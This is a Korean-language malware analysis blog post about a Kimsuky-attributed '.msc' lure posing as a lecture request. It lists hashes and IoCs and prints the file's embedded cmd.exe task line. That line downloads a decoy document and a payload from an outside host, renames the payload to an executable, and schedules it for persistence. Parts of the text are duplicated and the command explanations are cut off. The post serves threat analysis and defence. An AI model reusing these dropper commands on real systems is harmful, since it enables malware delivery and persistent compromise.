김수키(Kimsuky)에서 만든 항공우주공학과 관련자 타겟팅 악성코드-강의의뢰서(2024.8.29)
Contents
오늘은 김수키(Kimsuky) 에서 만든 항공우주공학과 관련자 타겟팅 악성코드인 강의의뢰서(2024.8.29)에 대해 알아보겠습니다. 요즈음 Kimsuky(김수키)가 보니 카이스트 항공우주공학과 방효충 교수님께 강연하는 것처럼 보내는 메일로 공격한 것을 추정되는 악성코드에 대해 분석을 해보겠습니다.
먼저 해쉬값은 다음과 같습니다.
파일명:강의의뢰서.msc
사이즈:142 KB
MD5:ef8947d291107256cb5883ac3bc163d0
SHA-1:cf8555a2d9fc8081ba8c8e29f7905dd926655df1
SHA-256:8028b918d06cf3635e7e77d29cb0a4622d8cf4ee30881fb297435f7328ff45e4
일단 해당 악성코드는 msc 확장자로 돼 있으며 일단 귀찮으니 노트패드++ 로 한번 열어 보았습니다.
뭐~노트 패드로 열어보면 여러 가지 나오는데 핵심만 보겠습니다.
<ConsoleTaskpads>
<ConsoleTaskpad ListSize="Medium" IsNodeSpecific="true" Replace(s)DefaultView="
tr(u)e" NoResults="true" Descriptio(n)sAsText="true" NodeType="{C96401CE-0E17-
11D3-885B(-)00C04F72C717}" ID="{656F3A6A-1A63-4FC4(-)9C9B-4B75AF6DF3A3}">
<String Name(=)"Name" ID="19"/>
<String Name="D(e)scription" Value=""/>
<String Name="Tool(t)ip" Value=""/>
<Tasks>
<Task Type="Command(L)ine" Command="cmd.exe">
<String Name="Name" I(D)="18"/>
<String Name="Descripti(o)n" ID="28"/>
<Symbol>
<Image Name="Small" Binar(y)RefIndex="6"/>
<Image Name="Large" BinaryRe(f)Index="7"/>
</Symbol>
<CommandLine Directory="" WindowS(t)ate="Minimized" Params="/c mode 15,1&curl
-o "%temp%(\)Grieco Kavanagh Passive Supporters.docx" "
http(:)//rem(.)zoom-meeting(.)kro(.)kr/0829_pprb/d.php?na=view"&
"%temp%\Grieco Kavanagh Passive Supporters(.)docx"&po
wershell -windowstyle hidden $a=1&curl -o "%appdata%\pest&qu
ot; "h(t)tp://rem(.)zoom-meeting(.)kro(.)kr/0829_pprb/d(.)php?na
=myapp"&type "%appdata%\pest">"%appdata%\p
est(.)exe"&schtasks /create /tn TemporaryClearStatesesf /tr
"%appdata%\pest(.)exe" /sc minute /mo 58 /f&curl -o &qu
ot;%appdata%\pest.exe.manifest" "ht(t)p://rem(.)zoom-meetin
g(.)kro(.)kr/0829_pprb/d.php?na=myappfest"&exit"/>
</Task>
</Tasks>
코드 분석
Params에 포함된 명령어 분석
mode 15,1: 명령 프롬프트 창의 크기를 조정하는 명령
curl -o "%temp%\Grieco Kavanagh Passive Supporters(.)docx" "hxxp://rem(.)zoom-meeting(.)kro(.)kr/0829_pprb/d(.)php?na=view:curl을 사용해 지정된 URL에서 Word 문서를 다운로드하여 임시 디렉터리에 저장
powershell -windowstyle hidden $a=1:파워셸 명령어를 숨겨진 창 상태로 실행
curl -o "%appdata%\pest" "hxxp://rem(.)zoom-meeting(.)kro(.)kr/0829_pprb/d(.)php?na=myapp: 지정된 URL에서 파일을 다운로드하여 %appdata% …
먼저 해쉬값은 다음과 같습니다.
파일명:강의의뢰서.msc
사이즈:142 KB
MD5:ef8947d291107256cb5883ac3bc163d0
SHA-1:cf8555a2d9fc8081ba8c8e29f7905dd926655df1
SHA-256:8028b918d06cf3635e7e77d29cb0a4622d8cf4ee30881fb297435f7328ff45e4
일단 해당 악성코드는 msc 확장자로 돼 있으며 일단 귀찮으니 노트패드++ 로 한번 열어 보았습니다.
뭐~노트 패드로 열어보면 여러 가지 나오는데 핵심만 보겠습니다.
<ConsoleTaskpads>
<ConsoleTaskpad ListSize="Medium" IsNodeSpecific="true" Replace(s)DefaultView="
tr(u)e" NoResults="true" Descriptio(n)sAsText="true" NodeType="{C96401CE-0E17-
11D3-885B(-)00C04F72C717}" ID="{656F3A6A-1A63-4FC4(-)9C9B-4B75AF6DF3A3}">
<String Name(=)"Name" ID="19"/>
<String Name="D(e)scription" Value=""/>
<String Name="Tool(t)ip" Value=""/>
<Tasks>
<Task Type="Command(L)ine" Command="cmd.exe">
<String Name="Name" I(D)="18"/>
<String Name="Descripti(o)n" ID="28"/>
<Symbol>
<Image Name="Small" Binar(y)RefIndex="6"/>
<Image Name="Large" BinaryRe(f)Index="7"/>
</Symbol>
<CommandLine Directory="" WindowS(t)ate="Minimized" Params="/c mode 15,1&curl
-o "%temp%(\)Grieco Kavanagh Passive Supporters.docx" "
http(:)//rem(.)zoom-meeting(.)kro(.)kr/0829_pprb/d.php?na=view"&
"%temp%\Grieco Kavanagh Passive Supporters(.)docx"&po
wershell -windowstyle hidden $a=1&curl -o "%appdata%\pest&qu
ot; "h(t)tp://rem(.)zoom-meeting(.)kro(.)kr/0829_pprb/d(.)php?na
=myapp"&type "%appdata%\pest">"%appdata%\p
est(.)exe"&schtasks /create /tn TemporaryClearStatesesf /tr
"%appdata%\pest(.)exe" /sc minute /mo 58 /f&curl -o &qu
ot;%appdata%\pest.exe.manifest" "ht(t)p://rem(.)zoom-meetin
g(.)kro(.)kr/0829_pprb/d.php?na=myappfest"&exit"/>
</Task>
</Tasks>
코드 분석
Params에 포함된 명령어 분석
mode 15,1: 명령 프롬프트 창의 크기를 조정하는 명령
curl -o "%temp%\Grieco Kavanagh Passive Supporters(.)docx" "hxxp://rem(.)zoom-meeting(.)kro(.)kr/0829_pprb/d(.)php?na=view:curl을 사용해 지정된 URL에서 Word 문서를 다운로드하여 임시 디렉터리에 저장
powershell -windowstyle hidden $a=1:파워셸 명령어를 숨겨진 창 상태로 실행
curl -o "%appdata%\pest" "hxxp://rem(.)zoom-meeting(.)kro(.)kr/0829_pprb/d(.)php?na=myapp: 지정된 URL에서 파일을 다운로드하여 %appdata% …
IoC
8028b918d06cf3635e7e77d29cb0a4622d8cf4ee30881fb297435f7328ff45e4
cf8555a2d9fc8081ba8c8e29f7905dd926655df1
ef8947d291107256cb5883ac3bc163d0
http://rem.zoom-meeting.kro.kr/0829_pprb/d.php
cf8555a2d9fc8081ba8c8e29f7905dd926655df1
ef8947d291107256cb5883ac3bc163d0
http://rem.zoom-meeting.kro.kr/0829_pprb/d.php